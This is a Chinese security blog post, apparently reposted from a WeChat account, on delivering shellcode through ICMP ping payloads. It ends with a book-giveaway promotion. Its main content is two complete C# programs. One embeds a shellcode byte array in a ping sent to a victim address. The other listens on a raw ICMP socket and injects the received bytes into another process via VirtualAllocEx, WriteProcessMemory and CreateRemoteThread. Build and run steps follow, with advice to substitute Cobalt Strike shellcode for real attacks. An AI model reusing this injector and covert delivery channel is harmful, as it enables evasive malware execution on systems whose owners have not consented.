使用ICMP传递shellcode【文末赠书】

  • A+
所属分类:安全文章
在研究不同的渗透方法时,我遇到了一种利用DNS的技术。在编写概念证明代码时,我注意到实现的ping函数很有趣。我们可以提供一个可容纳65,500字节的缓冲区。由于大小限制很大,我们可以将shellcode加载到我们的ICMP请求中,然后将其注入到目标的进程中。


在原博客中给出了两个c#源码


shellcodeInjector.cs

using System.Net.NetworkInformation;

namespace shellcodeInjector
{
class Program
{


public static void sendShellcode()
{
Ping pingSender = new Ping();
int timeout = 10000;
byte[] buf = new byte[311] {0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x0d,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x50,0x69,0x6e,0x67,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x69,0x6f,0x6e,0x00,0x53,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x69,0x6f,0x6e,0x20,0x76,0x69,0x61,0x20,0x50,0x49,0x4e,0x47,0x00 };


PingOptions options = new PingOptions(64, true);
pingSender.Send("VictimPrivIPHere", timeout, buf, options);
}


static void Main(string[] args)
{
sendShellcode();
}
}
}


pingInjection.cs

using System;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;

namespace PingInjection
{
class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processID);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr IpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

public static void shellcodeInjection(byte[] shellcode)
{
int notepadPID = 7972;
IntPtr hProcess = OpenProcess(0x001F0FFF, false, notepadPID);
IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
byte[] buf = shellcode;
IntPtr outSize;
WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize);
IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
}

public static byte[] getShellcode()
{
Socket icmpListener = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Icmp);
icmpListener.Bind(new IPEndPoint(IPAddress.Parse("192.168.0.15"), 0));
icmpListener.IOControl(IOControlCode.ReceiveAll, new byte[] { 1, 0, 0, 0 }, new byte[] { 1, 0, 0, 0 });
byte[] buffer = new byte[4096];
EndPoint remoteEndPoint = new IPEndPoint(IPAddress.Any, 0);
byte[] shellcode = new byte[4068];

var bytesRead = icmpListener.ReceiveFrom(buffer, ref remoteEndPoint);
System.Buffer.BlockCopy(buffer, 28, shellcode, 0, 4068);
return shellcode;
}


static void Main(string[] args)
{
byte[] shellcode = getShellcode();
shellcodeInjection(shellcode);
}
}
}

源码不难,这里就不一一分析了。

使用Vs编译好2个c#。

新建一个C#的控制台应用

使用ICMP传递shellcode【文末赠书】



这里放进我们的shellcode,这里使用原代码进行演示


使用ICMP传递shellcode【文末赠书】


编译


然后编译pingInjection.cs


注意修改ip地址:

使用ICMP传递shellcode【文末赠书】


ok 我们都编译好了
使用ICMP传递shellcode【文末赠书】


剩下要做的就是运行两个应用程序。首先,我们启动侦听器,然后启动注入器。

使用ICMP传递shellcode【文末赠书】



在实战中我们把shellcode替换成我们的shellcode就行。例如CS的。

原文:https://blog.romanrii.com/using-icmp-to-deliver-shellcode



每周赠书福利


使用ICMP传递shellcode【文末赠书】

一:Web渗透攻防实战

      本书从网络攻防实战的角度,对Web漏洞扫描利用及防御进行全面系统的研究,由浅入深地介绍了在渗透过程中如何对Web漏洞进行扫描、利用分析及防御,以及在漏洞扫描及利用过程中需要了解和掌握的基础技术。全书共分10章,包括漏洞扫描推荐基础知识、域名信息收集、端口扫描、指纹信息收集与目录扫描、Web;漏洞扫描、Web常见漏洞分析与利用、密码扫描及暴力破解、手工代码审计利用与漏洞挖掘、自动化的漏洞挖掘和利用、Web漏洞扫描安全防御,基本涵盖了Web漏洞攻防技术体系的全部内容。书中还以一些典型漏洞进行扫描利用及实战,通过漏洞扫描利用来还原攻击过程,从而可以针对性地进行防御。


二:Python 3.x基础教程 

     本书以零基础讲解为宗旨,旨在帮助读者掌握 Python 语言的基础知识,以及如何使用Python 语言实现编程,了解其开发技巧,并通过实战案例熟悉开发过程及问题的解决方法。


三:GO语言区块链应用开发从入门到精通

     语法、函数编程、容器编程、面向对象编程、并发编程以及网络编程;3~5章为进阶篇,第3章介绍区块链基本原理、发展历程、开发技术选型、行业应用案例,第4章主要介绍智能合约,包括Solidity基础语法,多个经典案例,以及Go语言如何调用智能合约,第5章主要介绍区块链原理的程序化实践,包括Go语言实现Base58编码、P2P网络、PoW共识、区块链组块,以及UTXO账户模型实现;6~7章为实战篇,介绍2个实战项目,第6章介绍如何实现Go语言版的区块链钱包项目,内容包括助记词生成、私钥存储、Coin交易及Token交易等内容,第7章介绍如何实现一个版权交易系统,内容包括如何设计区块链应用系统、后端功能如何与区块链相结合等,它既是一个区块链系统应用项目,也是一个Go语言Web服务器项目。

使用ICMP传递shellcode【文末赠书】

     为了感谢大家一直以来的关注与支持,会有书籍免费赠送使用ICMP传递shellcode【文末赠书】

    一等奖:《Web渗透攻防实战 》

    二等奖:《Python 3.x基础教程》

    三等奖:《GO语言区块链应用开发从入门到精通》

     规则如下:

     1.  本文末点‘在看’,不需要转发朋友圈,点个‘在看’就可以。

     2. 私聊文末公众号发送“抽奖”即可扫描参与抽奖,注意看是发送暗号“抽奖”

     3. 中奖者不满足条件1,视为放弃中奖资格。

     4. 活动截止时间为11月12日 18:00点,到时候还要中奖者及时联系号主发送你的中奖核验二维码、收货地址、姓名、手机号以及想要的书籍,好给您发送书籍哦!24小时内未联系号主视为自动放弃!骗书行为出版社会永久拉黑!



先点“再看”,然后点击下方公众号私聊发送“抽奖” 即可马上扫描参与抽奖使用ICMP传递shellcode【文末赠书】

原文始发于微信公众号(LemonSec):使用ICMP传递shellcode【文末赠书】

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: